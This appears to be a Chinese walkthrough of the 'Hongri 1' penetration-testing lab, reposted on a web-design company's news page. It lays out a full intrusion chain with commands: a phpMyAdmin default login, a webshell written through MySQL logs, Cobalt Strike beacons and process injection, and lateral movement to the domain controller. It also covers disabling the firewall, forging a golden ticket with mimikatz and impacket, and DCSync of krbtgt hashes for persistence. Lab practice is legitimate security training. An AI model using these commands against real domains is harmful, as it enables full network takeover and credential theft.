资讯动态

红日1 靶场全流程攻略(含黄金票据)

发布时间:2026/8/21 7:04:31 来源:尧图企业网站定制
红日1 靶场攻略配置网络2003Win72008虚拟网络编辑器点击更改设置VMnet1网段改成52应用保存注意如果遇到报错VMware Workstation 不可恢复错误: (vcpu-0) VERIFY bora\vmx\main\hostWin32.c:559 日志文件位于xxx/vmware.log中。三台虚拟机的密码都是hongrisec2019第一次登录会要求改密码。如果遇到上面的报错更新到最新版的VMware就能解决。进入系统查看网络配置把win7的防火墙关掉然后重启然后每台虚拟机互ping都通了就可以下一步启动web服务Win7访问127.0.0.1kali访问192.168.200.128通了说明配置完成开始攻击靶场目录爆破Nmap扫描目录爆破发现phpmyadmin访问尝试默认密码 root/root登录进去直接尝试写入木马文件发现有secure_file_priv 限制了文件写入尝试日志写入木马先看日志写入是否开启开启日志写入SETGLOBALgeneral_logON;修改日志路径指定到php文件写入木马连接蚁剑CS渗透启动CS服务器启动cs服务器ip设置为kali的ip后面跟密码注意要root权限./teamserver192.168.200.129 密码启动cs密码是刚刚设置的密码设置监听器设置新的监听器生成木马上传木马蚁剑启动木马上线成功提权信息收集查看网络配置shell ipconfig查看本地用户shell net user查看主机信息被拒绝了Beacon 当前运行的用户没有有效的登录会话——通常是跑在 SYSTEM 权限的后台服务或非交互式会话里Windows 拒绝执行需要用户会话的命令shell net config Workstation注入到交互式进程找到explorer.exe进程的pidshellps注入inject 2916 x64 kali切换到新程序查看主机信息发现域名称shell net config Workstation可以getsystem提权查看有几个域shell net view /domain查看域内主机名称跟ipowa是域控net viewType含义PDC主域控制器Primary Domain ControllerBDC备份域控制器Backup Domain ControllerNT普通 NT 服务器Wk工作站横向移动对win7进行端口扫描扫描出445端口445 端口是 Windows 横向移动的核心端口因为它是 SMB 协议的端口新建一个smb的监听器横向移动到owa记得先抓取密码上线成功关闭域控防火墙shell netsh advfirewallsetallprofiles state off维持权限制作黄金票据抓明文密码看sid跟域名S-1-5-21-2952760202-1353902439-2381784089-1000 GOD.ORG抓取hash制作票据保存票据mimikatz kerberos::list /exportGolden Ticket 票据的用法1. 在当前 CS beacon 里用已经注入了你之前执行 Golden Ticket 时已经自动注入了Pass The Ticket当前会话已经有域管权限了。直接用 CS 内置命令访问域控beacon shell dir \\OWA\c$ beacon shell dir \\OWA\admin$ beacon psexec 192.168.52.138 smb2. 把票据用到其他机器/会话方法 A在 CS 里重新注入beacon upload golden.kirbi C:\Windows\Temp\golden.kirbi beacon mimikatz kerberos::ptt C:\Windows\Temp\golden.kirbiptt Pass The Ticket把票据注入到当前会话。方法 B在 Kali 上用 impacket 工具# 把 .kirbi 转成 ccache 格式python3 /usr/share/impacket/examples/ticketConverter.py golden.kirbi golden.ccache# 设置环境变量exportKRB5CCNAME/root/golden.ccache# 用票据访问域控python3 /usr/share/impacket/examples/psexec.py GOD.ORG/Administrator192.168.52.138-k-no-pass python3 /usr/share/impacket/examples/wmiexec.py GOD.ORG/Administrator192.168.52.138-k-no-pass python3 /usr/share/impacket/examples/smbexec.py GOD.ORG/Administrator192.168.52.138-k-no-pass方法 C用 RubeusWindows 上Rubeus.exe ptt /ticket:golden.kirbi3. 票据能做什么操作命令说明访问域控文件共享dir \\OWA\c$不需要密码直接用票据认证横向移动到域控psexec 192.168.52.138用票据做 SMB 认证DCSync 抓哈希mimikatz lsadump::dcsync /domain:GOD.ORG /user:krbtgt从域控同步密码哈希访问任何域内服务kerberos::tgt用 Golden Ticket 请求任意服务的 TGS4. 实际攻击场景场景 1直接打域控beacon psexec 192.168.52.138 smb用当前注入的 Golden Ticket 直接 PsExec 到域控拿 SYSTEM beacon。场景 2DCSync 抓所有域用户哈希beacon mimikatz lsadump::dcsync /domain:GOD.ORG /user:krbtgt beacon mimikatz lsadump::dcsync /domain:GOD.ORG /user:Administrator用 Golden Ticket 伪装成域管从域控同步密码哈希。场景 3持久化把golden.kirbi保存到本地以后随时可以注入即使域管改密码票据在有效期内默认 10 年都能用。你现在最直接的操作beacon psexec 192.168.52.138 smb用当前 Golden Ticket 直接打域控 OWA拿到域控的 beacon 就结束了。或者更暴力beacon mimikatz lsadump::dcsync /domain:GOD.ORG /user:krbtgt把 krbtgt 的哈希抓出来以后随时能造新的 Golden Ticket。

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价